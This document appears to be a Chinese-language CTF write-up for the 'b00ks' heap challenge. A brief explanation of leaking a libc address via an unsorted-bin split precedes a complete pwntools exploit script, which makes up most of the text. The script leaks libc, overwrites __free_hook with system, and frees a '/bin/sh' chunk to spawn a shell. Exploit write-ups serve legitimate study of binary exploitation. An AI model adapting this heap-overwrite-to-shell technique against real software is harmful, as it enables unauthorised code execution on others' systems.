1.利用unsorted_bin分割chunk后,后面的chunk的fd会保留main_arena的偏移值。并且要注意fd在地址最后字节为00的地方,才可以泄露。并且第一次释放掉chunk0后,再次申请时,description的值要大于第一次申请的chunk0,让202060(chunk[0])处的地址刚好能指向fd。 还有就是泄露出来的地址是smallbin中的地址,因为在smallbin中没有放入chunk时,smallbin数组中中会指向比此时小0x10的地址。
from pwn import * context.log_level = 'debug' libc = ELF('./') file = './b00ks' elf = ELF(file) local = 1 if local: io = process(file) else: io = remote('',26386) def debug(): gdb.attach(io) r = lambda : io.recv() rx = lambda x: io.recv(x) ru = lambda x: io.recvuntil(x) rud = lambda x: io.recvuntil(x, drop=True) s = lambda x: io.send(x) sl = lambda x: io.sendline(x) sa = lambda x, y: io.sendafter(x, y) sla = lambda x, y: io.sendlineafter(x, y) shell = lambda : io.interactive() def add(name_size,book_name,description_size,book_description): ru('> ') sl('1') ru('Enter book name size: ') sl(str(name_size)) ru('Enter book name (Max 32 chars): ') sl(book_name) ru('Enter book description size: ') sl(str(description_size)) ru('Enter book description: ') sl(book_description) def free(idx): ru('> ') sl('2') ru('Enter the book id you want to delete: ') sl(str(idx)) def edit(idx,book_description): ru('> ') sl('3') ru('Enter the book id you want to edit: ') sl(str(idx)) ru('Enter new book description: ') sl(book_description) def show(): ru('> ') sl('4') def change_author_name(author_name): ru('> ') sl('5') ru('Enter author name: ') sl(author_name) ru('Enter author name: ') sl('aaa') add(0xd0,'a',0x90,'b') #id=1 add(0x10,'/bin/sh\x00',0x10,'d') #id=2 free(1) add(0xd0,'e',0xa0,'f') #id=3 pay1 = b'a'*32 change_author_name(pay1) show() ru('Name: ') unsorted = u64(rx(6).ljust(8,b'\x00')) #泄露出来的时smallbin中的地址刚好(我们刻意没有申请那个大小的chunk)没有相应大小的chunk,所以会指向比他小0x10的地址 print('unsorted:',hex(unsorted)) libcbase = unsorted - 216 - 0x10 - libc.sym['__malloc_hook'] print('libcbase:',hex(libcbase)) malloc_hook = libcbase + libc.sym['__malloc_hook'] system_addr = libcbase + libc.sym['system'] free_hook = libcbase + libc.sym['__free_hook'] pay2 = p64(0x1) + p64(0) + p64(free_hook) + p64(0x20) #构造写入的地址和大小 add(0x20,pay2,0x10,'a') edit(1,p64(system_addr)) free(2) shell()